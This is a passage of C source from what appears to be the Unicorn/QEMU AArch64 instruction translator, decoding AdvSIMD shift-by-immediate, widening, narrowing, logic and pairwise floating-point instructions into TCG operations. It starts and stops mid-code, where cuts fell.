tcg_temp_free_i32(tcg_ctx, tcg_rd); tcg_temp_free_i32(tcg_ctx, tcg_rn); } if (is_fcvt) { gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_rmode); tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); } } /* SSHR[RA]/USHR[RA] - Vector shift right (optional rounding/accumulate) */ static void handle_vec_simd_shri(DisasContext *s, bool is_q, bool is_u, int immh, int immb, int opcode, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = 32 - clz32(immh) - 1; int immhb = immh << 3 | immb; int shift = 2 * (8 << size) - immhb; bool accumulate = false; int dsize = is_q ? 128 : 64; int esize = 8 << size; int elements = dsize/esize; MemOp memop = size | (is_u ? 0 : MO_SIGN); TCGv_i64 tcg_rn = new_tmp_a64(s); TCGv_i64 tcg_rd = new_tmp_a64(s); TCGv_i64 tcg_round; uint64_t round_const; int i; if (extract32(immh, 3, 1) && !is_q) { unallocated_encoding(s); return; } tcg_debug_assert(size <= 3); if (!fp_access_check(s)) { return; } switch (opcode) { case 0x02: /* SSRA / USRA (accumulate) */ if (is_u) { /* Shift count same as element size produces zero to add. */ if (shift == 8 << size) { goto done; } gen_gvec_op2i(s, is_q, rd, rn, shift, &usra_op[size]); } else { /* Shift count same as element size produces all sign to add. */ if (shift == 8 << size) { shift -= 1; } gen_gvec_op2i(s, is_q, rd, rn, shift, &ssra_op[size]); } return; case 0x08: /* SRI */ /* Shift count same as element size is valid but does nothing. */ if (shift == 8 << size) { goto done; } gen_gvec_op2i(s, is_q, rd, rn, shift, &sri_op[size]); return; case 0x00: /* SSHR / USHR */ if (is_u) { if (shift == 8 << size) { /* Shift count the same size as element size produces zero. */ tcg_gen_gvec_dup8i(tcg_ctx, vec_full_reg_offset(s, rd), is_q ? 16 : 8, vec_full_reg_size(s), 0); } else { gen_gvec_fn2i(s, is_q, rd, rn, shift, tcg_gen_gvec_shri, size); } } else { /* Shift count the same size as element size produces all sign. */ if (shift == 8 << size) { shift -= 1; } gen_gvec_fn2i(s, is_q, rd, rn, shift, tcg_gen_gvec_sari, size); } return; case 0x04: /* SRSHR / URSHR (rounding) */ break; case 0x06: /* SRSRA / URSRA (accum + rounding) */ accumulate = true; break; default: g_assert_not_reached(); } round_const = 1ULL << (shift - 1); tcg_round = tcg_const_i64(tcg_ctx, round_const); for (i = 0; i < elements; i++) { read_vec_element(s, tcg_rn, rn, i, memop); if (accumulate) { read_vec_element(s, tcg_rd, rd, i, memop); } handle_shri_with_rndacc(tcg_ctx, tcg_rd, tcg_rn, tcg_round, accumulate, is_u, size, shift); write_vec_element(s, tcg_rd, rd, i, size); } tcg_temp_free_i64(tcg_ctx, tcg_round); done: clear_vec_high(s, is_q, rd); } /* SHL/SLI - Vector shift left */ static void handle_vec_simd_shli(DisasContext *s, bool is_q, bool insert, int immh, int immb, int opcode, int rn, int rd) { int size = 32 - clz32(immh) - 1; int immhb = immh << 3 | immb; int shift = immhb - (8 << size); /* Range of size is limited by decode: immh is a non-zero 4 bit field */ assert(size >= 0 && size <= 3); if (extract32(immh, 3, 1) && !is_q) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (insert) { gen_gvec_op2i(s, is_q, rd, rn, shift, &sli_op[size]); } else { gen_gvec_fn2i(s, is_q, rd, rn, shift, tcg_gen_gvec_shli, size); } } /* USHLL/SHLL - Vector shift left with widening */ static void handle_vec_simd_wshli(DisasContext *s, bool is_q, bool is_u, int immh, int immb, int opcode, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = 32 - clz32(immh) - 1; int immhb = immh << 3 | immb; int shift = immhb - (8 << size); int dsize = 64; int esize = 8 << size; int elements = dsize/esize; TCGv_i64 tcg_rn = new_tmp_a64(s); TCGv_i64 tcg_rd = new_tmp_a64(s); int i; if (size >= 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } /* For the LL variants the store is larger than the load, * so if rd == rn we would overwrite parts of our input. * So load everything right now and use shifts in the main loop. */ read_vec_element(s, tcg_rn, rn, is_q ? 1 : 0, MO_64); for (i = 0; i < elements; i++) { tcg_gen_shri_i64(tcg_ctx, tcg_rd, tcg_rn, i * esize); ext_and_shift_reg(tcg_ctx, tcg_rd, tcg_rd, size | (!is_u << 2), 0); tcg_gen_shli_i64(tcg_ctx, tcg_rd, tcg_rd, shift); write_vec_element(s, tcg_rd, rd, i, size + 1); } } /* SHRN/RSHRN - Shift right with narrowing (and potential rounding) */ static void handle_vec_simd_shrn(DisasContext *s, bool is_q, int immh, int immb, int opcode, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int immhb = immh << 3 | immb; int size = 32 - clz32(immh) - 1; int dsize = 64; int esize = 8 << size; int elements = dsize/esize; int shift = (2 * esize) - immhb; bool round = extract32(opcode, 0, 1); TCGv_i64 tcg_rn, tcg_rd, tcg_final; TCGv_i64 tcg_round; int i; if (extract32(immh, 3, 1)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rn = tcg_temp_new_i64(tcg_ctx); tcg_rd = tcg_temp_new_i64(tcg_ctx); tcg_final = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_final, rd, is_q ? 1 : 0, MO_64); if (round) { uint64_t round_const = 1ULL << (shift - 1); tcg_round = tcg_const_i64(tcg_ctx, round_const); } else { tcg_round = NULL; } for (i = 0; i < elements; i++) { read_vec_element(s, tcg_rn, rn, i, size+1); handle_shri_with_rndacc(tcg_ctx, tcg_rd, tcg_rn, tcg_round, false, true, size+1, shift); tcg_gen_deposit_i64(tcg_ctx, tcg_final, tcg_final, tcg_rd, esize * i, esize); } if (!is_q) { write_vec_element(s, tcg_final, rd, 0, MO_64); } else { write_vec_element(s, tcg_final, rd, 1, MO_64); } if (round) { tcg_temp_free_i64(tcg_ctx, tcg_round); } tcg_temp_free_i64(tcg_ctx, tcg_rn); tcg_temp_free_i64(tcg_ctx, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_final); clear_vec_high(s, is_q, rd); } /* AdvSIMD shift by immediate * 31 30 29 28 23 22 19 18 16 15 11 10 9 5 4 0 * +---+---+---+-------------+------+------+--------+---+------+------+ * | 0 | Q | U | 0 1 1 1 1 0 | immh | immb | opcode | 1 | Rn | Rd | * +---+---+---+-------------+------+------+--------+---+------+------+ */ static void disas_simd_shift_imm(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 11, 5); int immb = extract32(insn, 16, 3); int immh = extract32(insn, 19, 4); bool is_u = extract32(insn, 29, 1); bool is_q = extract32(insn, 30, 1); /* data_proc_simd[] has sent immh == 0 to disas_simd_mod_imm. */ assert(immh != 0); switch (opcode) { case 0x08: /* SRI */ if (!is_u) { unallocated_encoding(s); return; } /* fall through */ case 0x00: /* SSHR / USHR */ case 0x02: /* SSRA / USRA (accumulate) */ case 0x04: /* SRSHR / URSHR (rounding) */ case 0x06: /* SRSRA / URSRA (accum + rounding) */ handle_vec_simd_shri(s, is_q, is_u, immh, immb, opcode, rn, rd); break; case 0x0a: /* SHL / SLI */ handle_vec_simd_shli(s, is_q, is_u, immh, immb, opcode, rn, rd); break; case 0x10: /* SHRN */ case 0x11: /* RSHRN / SQRSHRUN */ if (is_u) { handle_vec_simd_sqshrn(s, false, is_q, false, true, immh, immb, opcode, rn, rd); } else { handle_vec_simd_shrn(s, is_q, immh, immb, opcode, rn, rd); } break; case 0x12: /* SQSHRN / UQSHRN */ case 0x13: /* SQRSHRN / UQRSHRN */ handle_vec_simd_sqshrn(s, false, is_q, is_u, is_u, immh, immb, opcode, rn, rd); break; case 0x14: /* SSHLL / USHLL */ handle_vec_simd_wshli(s, is_q, is_u, immh, immb, opcode, rn, rd); break; case 0x1c: /* SCVTF / UCVTF */ handle_simd_shift_intfp_conv(s, false, is_q, is_u, immh, immb, opcode, rn, rd); break; case 0xc: /* SQSHLU */ if (!is_u) { unallocated_encoding(s); return; } handle_simd_qshl(s, false, is_q, false, true, immh, immb, rn, rd); break; case 0xe: /* SQSHL, UQSHL */ handle_simd_qshl(s, false, is_q, is_u, is_u, immh, immb, rn, rd); break; case 0x1f: /* FCVTZS/ FCVTZU */ handle_simd_shift_fpint_conv(s, false, is_q, is_u, immh, immb, rn, rd); return; default: unallocated_encoding(s); return; } } /* Generate code to do a "long" addition or subtraction, ie one done in * TCGv_i64 on vector lanes twice the width specified by size. */ static void gen_neon_addl(TCGContext *tcg_ctx, int size, bool is_sub, TCGv_i64 tcg_res, TCGv_i64 tcg_op1, TCGv_i64 tcg_op2) { static NeonGenTwo64OpFn * const fns[3][2] = { { gen_helper_neon_addl_u16, gen_helper_neon_subl_u16 }, { gen_helper_neon_addl_u32, gen_helper_neon_subl_u32 }, { tcg_gen_add_i64, tcg_gen_sub_i64 }, }; NeonGenTwo64OpFn *genfn; assert(size < 3); genfn = fns[size][is_sub]; genfn(tcg_ctx, tcg_res, tcg_op1, tcg_op2); } static void handle_3rd_widening(DisasContext *s, int is_q, int is_u, int size, int opcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* 3-reg-different widening insns: 64 x 64 -> 128 */ TCGv_i64 tcg_res[2]; int pass, accop; tcg_res[0] = tcg_temp_new_i64(tcg_ctx); tcg_res[1] = tcg_temp_new_i64(tcg_ctx); /* Does this op do an adding accumulate, a subtracting accumulate, * or no accumulate at all? */ switch (opcode) { case 5: case 8: case 9: accop = 1; break; case 10: case 11: accop = -1; break; default: accop = 0; break; } if (accop != 0) { read_vec_element(s, tcg_res[0], rd, 0, MO_64); read_vec_element(s, tcg_res[1], rd, 1, MO_64); } /* size == 2 means two 32x32->64 operations; this is worth special * casing because we can generally handle it inline. */ if (size == 2) { for (pass = 0; pass < 2; pass++) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_passres; MemOp memop = MO_32 | (is_u ? 0 : MO_SIGN); int elt = pass + is_q * 2; read_vec_element(s, tcg_op1, rn, elt, memop); read_vec_element(s, tcg_op2, rm, elt, memop); if (accop == 0) { tcg_passres = tcg_res[pass]; } else { tcg_passres = tcg_temp_new_i64(tcg_ctx); } switch (opcode) { case 0: /* SADDL, SADDL2, UADDL, UADDL2 */ tcg_gen_add_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); break; case 2: /* SSUBL, SSUBL2, USUBL, USUBL2 */ tcg_gen_sub_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); break; case 5: /* SABAL, SABAL2, UABAL, UABAL2 */ case 7: /* SABDL, SABDL2, UABDL, UABDL2 */ { TCGv_i64 tcg_tmp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_tmp2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_sub_i64(tcg_ctx, tcg_tmp1, tcg_op1, tcg_op2); tcg_gen_sub_i64(tcg_ctx, tcg_tmp2, tcg_op2, tcg_op1); tcg_gen_movcond_i64(tcg_ctx, is_u ? TCG_COND_GEU : TCG_COND_GE, tcg_passres, tcg_op1, tcg_op2, tcg_tmp1, tcg_tmp2); tcg_temp_free_i64(tcg_ctx, tcg_tmp1); tcg_temp_free_i64(tcg_ctx, tcg_tmp2); break; } case 8: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ case 10: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ case 12: /* UMULL, UMULL2, SMULL, SMULL2 */ tcg_gen_mul_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); break; case 9: /* SQDMLAL, SQDMLAL2 */ case 11: /* SQDMLSL, SQDMLSL2 */ case 13: /* SQDMULL, SQDMULL2 */ tcg_gen_mul_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, tcg_passres, tcg_passres); break; default: g_assert_not_reached(); } if (opcode == 9 || opcode == 11) { /* saturating accumulate ops */ if (accop < 0) { tcg_gen_neg_i64(tcg_ctx, tcg_passres, tcg_passres); } gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, tcg_res[pass], tcg_passres); } else if (accop > 0) { tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); } else if (accop < 0) { tcg_gen_sub_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); } if (accop != 0) { tcg_temp_free_i64(tcg_ctx, tcg_passres); } tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); } } else { /* size 0 or 1, generally helper functions */ for (pass = 0; pass < 2; pass++) { TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 tcg_passres; int elt = pass + is_q * 2; read_vec_element_i32(s, tcg_op1, rn, elt, MO_32); read_vec_element_i32(s, tcg_op2, rm, elt, MO_32); if (accop == 0) { tcg_passres = tcg_res[pass]; } else { tcg_passres = tcg_temp_new_i64(tcg_ctx); } switch (opcode) { case 0: /* SADDL, SADDL2, UADDL, UADDL2 */ case 2: /* SSUBL, SSUBL2, USUBL, USUBL2 */ { TCGv_i64 tcg_op2_64 = tcg_temp_new_i64(tcg_ctx); static NeonGenWidenFn * const widenfns[2][2] = { { gen_helper_neon_widen_s8, gen_helper_neon_widen_u8 }, { gen_helper_neon_widen_s16, gen_helper_neon_widen_u16 }, }; NeonGenWidenFn *widenfn = widenfns[size][is_u]; widenfn(tcg_ctx, tcg_op2_64, tcg_op2); widenfn(tcg_ctx, tcg_passres, tcg_op1); gen_neon_addl(tcg_ctx, size, (opcode == 2), tcg_passres, tcg_passres, tcg_op2_64); tcg_temp_free_i64(tcg_ctx, tcg_op2_64); break; } case 5: /* SABAL, SABAL2, UABAL, UABAL2 */ case 7: /* SABDL, SABDL2, UABDL, UABDL2 */ if (size == 0) { if (is_u) { gen_helper_neon_abdl_u16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } else { gen_helper_neon_abdl_s16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } } else { if (is_u) { gen_helper_neon_abdl_u32(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } else { gen_helper_neon_abdl_s32(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } } break; case 8: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ case 10: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ case 12: /* UMULL, UMULL2, SMULL, SMULL2 */ if (size == 0) { if (is_u) { gen_helper_neon_mull_u8(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } else { gen_helper_neon_mull_s8(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } } else { if (is_u) { gen_helper_neon_mull_u16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } else { gen_helper_neon_mull_s16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } } break; case 9: /* SQDMLAL, SQDMLAL2 */ case 11: /* SQDMLSL, SQDMLSL2 */ case 13: /* SQDMULL, SQDMULL2 */ assert(size == 1); gen_helper_neon_mull_s16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, tcg_passres, tcg_passres); break; default: g_assert_not_reached(); } tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); if (accop != 0) { if (opcode == 9 || opcode == 11) { /* saturating accumulate ops */ if (accop < 0) { gen_helper_neon_negl_u32(tcg_ctx, tcg_passres, tcg_passres); } gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, tcg_res[pass], tcg_passres); } else { gen_neon_addl(tcg_ctx, size, (accop < 0), tcg_res[pass], tcg_res[pass], tcg_passres); } tcg_temp_free_i64(tcg_ctx, tcg_passres); } } } write_vec_element(s, tcg_res[0], rd, 0, MO_64); write_vec_element(s, tcg_res[1], rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res[0]); tcg_temp_free_i64(tcg_ctx, tcg_res[1]); } static void handle_3rd_wide(DisasContext *s, int is_q, int is_u, int size, int opcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_res[2]; int part = is_q ? 2 : 0; int pass; for (pass = 0; pass < 2; pass++) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 tcg_op2_wide = tcg_temp_new_i64(tcg_ctx); static NeonGenWidenFn * const widenfns[3][2] = { { gen_helper_neon_widen_s8, gen_helper_neon_widen_u8 }, { gen_helper_neon_widen_s16, gen_helper_neon_widen_u16 }, { tcg_gen_ext_i32_i64, tcg_gen_extu_i32_i64 }, }; NeonGenWidenFn *widenfn = widenfns[size][is_u]; read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element_i32(s, tcg_op2, rm, part + pass, MO_32); widenfn(tcg_ctx, tcg_op2_wide, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); gen_neon_addl(tcg_ctx, size, (opcode == 3), tcg_res[pass], tcg_op1, tcg_op2_wide); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2_wide); } for (pass = 0; pass < 2; pass++) { write_vec_element(s, tcg_res[pass], rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); } } static void do_narrow_round_high_u32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i64 in) { tcg_gen_addi_i64(tcg_ctx, in, in, 1U << 31); tcg_gen_extrh_i64_i32(tcg_ctx, res, in); } static void handle_3rd_narrowing(DisasContext *s, int is_q, int is_u, int size, int opcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_res[2]; int part = is_q ? 2 : 0; int pass; for (pass = 0; pass < 2; pass++) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_wideres = tcg_temp_new_i64(tcg_ctx); static NeonGenNarrowFn * const narrowfns[3][2] = { { gen_helper_neon_narrow_high_u8, gen_helper_neon_narrow_round_high_u8 }, { gen_helper_neon_narrow_high_u16, gen_helper_neon_narrow_round_high_u16 }, { tcg_gen_extrh_i64_i32, do_narrow_round_high_u32 }, }; NeonGenNarrowFn *gennarrow = narrowfns[size][is_u]; read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element(s, tcg_op2, rm, pass, MO_64); gen_neon_addl(tcg_ctx, size, (opcode == 6), tcg_wideres, tcg_op1, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); gennarrow(tcg_ctx, tcg_res[pass], tcg_wideres); tcg_temp_free_i64(tcg_ctx, tcg_wideres); } for (pass = 0; pass < 2; pass++) { write_vec_element_i32(s, tcg_res[pass], rd, pass + part, MO_32); tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); } clear_vec_high(s, is_q, rd); } /* AdvSIMD three different * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 * +---+---+---+-----------+------+---+------+--------+-----+------+------+ * | 0 | Q | U | 0 1 1 1 0 | size | 1 | Rm | opcode | 0 0 | Rn | Rd | * +---+---+---+-----------+------+---+------+--------+-----+------+------+ */ static void disas_simd_three_reg_diff(DisasContext *s, uint32_t insn) { /* Instructions in this group fall into three basic classes * (in each case with the operation working on each element in * the input vectors): * (1) widening 64 x 64 -> 128 (with possibly Vd as an extra * 128 bit input) * (2) wide 64 x 128 -> 128 * (3) narrowing 128 x 128 -> 64 * Here we do initial decode, catch unallocated cases and * dispatch to separate functions for each class. */ int is_q = extract32(insn, 30, 1); int is_u = extract32(insn, 29, 1); int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 4); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); switch (opcode) { case 1: /* SADDW, SADDW2, UADDW, UADDW2 */ case 3: /* SSUBW, SSUBW2, USUBW, USUBW2 */ /* 64 x 128 -> 128 */ if (size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_3rd_wide(s, is_q, is_u, size, opcode, rd, rn, rm); break; case 4: /* ADDHN, ADDHN2, RADDHN, RADDHN2 */ case 6: /* SUBHN, SUBHN2, RSUBHN, RSUBHN2 */ /* 128 x 128 -> 64 */ if (size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_3rd_narrowing(s, is_q, is_u, size, opcode, rd, rn, rm); break; case 14: /* PMULL, PMULL2 */ if (is_u) { unallocated_encoding(s); return; } switch (size) { case 0: /* PMULL.P8 */ if (!fp_access_check(s)) { return; } /* The Q field specifies lo/hi half input for this insn. */ gen_gvec_op3_ool(s, true, rd, rn, rm, is_q, gen_helper_neon_pmull_h); break; case 3: /* PMULL.P64 */ if (!dc_isar_feature(aa64_pmull, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } /* The Q field specifies lo/hi half input for this insn. */ gen_gvec_op3_ool(s, true, rd, rn, rm, is_q, gen_helper_gvec_pmull_q); break; default: unallocated_encoding(s); break; } return; case 9: /* SQDMLAL, SQDMLAL2 */ case 11: /* SQDMLSL, SQDMLSL2 */ case 13: /* SQDMULL, SQDMULL2 */ if (is_u || size == 0) { unallocated_encoding(s); return; } /* fall through */ case 0: /* SADDL, SADDL2, UADDL, UADDL2 */ case 2: /* SSUBL, SSUBL2, USUBL, USUBL2 */ case 5: /* SABAL, SABAL2, UABAL, UABAL2 */ case 7: /* SABDL, SABDL2, UABDL, UABDL2 */ case 8: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ case 10: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ case 12: /* SMULL, SMULL2, UMULL, UMULL2 */ /* 64 x 64 -> 128 */ if (size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_3rd_widening(s, is_q, is_u, size, opcode, rd, rn, rm); break; default: /* opcode 15 not allocated */ unallocated_encoding(s); break; } } /* Logic op (opcode == 3) subgroup of C3.6.16. */ static void disas_simd_3same_logic(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rm = extract32(insn, 16, 5); int size = extract32(insn, 22, 2); bool is_u = extract32(insn, 29, 1); bool is_q = extract32(insn, 30, 1); if (!fp_access_check(s)) { return; } switch (size + 4 * is_u) { case 0: /* AND */ gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_and, 0); return; case 1: /* BIC */ gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_andc, 0); return; case 2: /* ORR */ gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_or, 0); return; case 3: /* ORN */ gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_orc, 0); return; case 4: /* EOR */ gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_xor, 0); return; case 5: /* BSL bitwise select */ gen_gvec_fn4(s, is_q, rd, rd, rn, rm, tcg_gen_gvec_bitsel, 0); return; case 6: /* BIT, bitwise insert if true */ gen_gvec_fn4(s, is_q, rd, rm, rn, rd, tcg_gen_gvec_bitsel, 0); return; case 7: /* BIF, bitwise insert if false */ gen_gvec_fn4(s, is_q, rd, rm, rd, rn, tcg_gen_gvec_bitsel, 0); return; default: g_assert_not_reached(); } } /* Pairwise op subgroup of C3.6.16. * * This is called directly or via the handle_3same_float for float pairwise * operations where the opcode and size are calculated differently. */ static void handle_simd_3same_pair(DisasContext *s, int is_q, int u, int opcode, int size, int rn, int rm, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; int pass; /* Floating point operations need fpst */ if (opcode >= 0x58) { fpst = get_fpstatus_ptr(tcg_ctx, false); } else { fpst = NULL; } if (!fp_access_check(s)) { return; } /* These operations work on the concatenated rm:rn, with each pair of * adjacent elements being operated on to produce an element in the result. */ if (size == 3) { TCGv_i64 tcg_res[2]; for (pass = 0; pass < 2; pass++) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); int passreg = (pass == 0) ? rn : rm; read_vec_element(s, tcg_op1, passreg, 0, MO_64); read_vec_element(s, tcg_op2, passreg, 1, MO_64); tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); switch (opcode) { case 0x17: /* ADDP */ tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); break; case 0x58: /* FMAXNMP */ gen_helper_vfp_maxnumd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x5a: /* FADDP */ gen_helper_vfp_addd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x5e: /* FMAXP */ gen_helper_vfp_maxd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x78: /* FMINNMP */ gen_helper_vfp_minnumd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x7e: /* FMINP */ gen_helper_vfp_mind(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); } for (pass = 0; pass < 2; pass++) { write_vec_element(s, tcg_res[pass], rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); } } else { int maxpass = is_q ? 4 : 2; TCGv_i32 tcg_res[4]; for (pass = 0; pass < maxpass; pass++) { TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); NeonGenTwoOpFn *genfn = NULL; int passreg = pass < (maxpass / 2) ? rn : rm; int passelt = (is_q && (pass & 1)) ? 2 : 0; read_vec_element_i32(s, tcg_op1, passreg, passelt, MO_32); read_vec_element_i32(s, tcg_op2, passreg, passelt + 1, MO_32); tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); switch (opcode) { case 0x17: /* ADDP */ { static NeonGenTwoOpFn * const fns[3] = { gen_helper_neon_padd_u8, gen_helper_neon_padd_u16, tcg_gen_add_i32, }; genfn = fns[size]; break; } case 0x14: /* SMAXP, UMAXP */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_pmax_s8, gen_helper_neon_pmax_u8 }, { gen_helper_neon_pmax_s16, gen_helper_neon_pmax_u16 }, { tcg_gen_smax_i32, tcg_gen_umax_i32 }, }; genfn = fns[size][u]; break; } case 0x15: /* SMINP, UMINP */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_pmin_s8, gen_helper_neon_pmin_u8 }, { gen_helper_neon_pmin_s16, gen_helper_neon_pmin_u16 }, { tcg_gen_smin_i32, tcg_gen_umin_i32 }, }; genfn = fns[size][u]; break; } /* The FP operations are all on single floats (32 bit) */ case 0x58: /* FMAXNMP */ gen_helper_vfp_maxnums(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x5a: /* FADDP */ gen_helper_vfp_adds(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x5e: /* FMAXP */ gen_helper_vfp_maxs(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x78: /* FMINNMP */ gen_helper_vfp_minnums(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x7e: /* FMINP */ gen_helper_vfp_mins(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } /* FP ops called directly, otherwise call now */ if (genfn) { genfn(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); } tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); } for (pass = 0; pass < maxpass; pass++) { write_vec_element_i32(s, tcg_res[pass], rd, pass, MO_32); tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); } clear_vec_high(s, is_q, rd); } if (fpst) { tcg_temp_free_ptr(tcg_ctx, fpst); } } /* Floating point op subgroup of C3.6.16. */ static void disas_simd_3same_float(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* For floating point ops, the U, size[1] and opcode bits * together indicate the operation. size[0] indicates single * or double. */ int fpopcode = extract32(insn, 11, 5) | (extract32(insn, 23, 1) << 5) | (extract32(insn, 29, 1) << 6); int is_q = extract32(insn, 30, 1); int size = extract32(insn, 22, 1); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); int datasize = is_q ? 128 : 64; int esize = 32 << size; int elements = datasize / esize; if (size == 1 && !is_q) { unallocated_encoding(s); return; } switch (fpopcode) { case 0x58: /* FMAXNMP */ case 0x5a: /* FADDP */ case 0x5e: /* FMAXP */ case 0x78: /* FMINNMP */ case 0x7e: /* FMINP */ if (size && !is_q) { unallocated_encoding(s); return; } handle_simd_3same_pair(s, is_q, 0, fpopcode, size ? 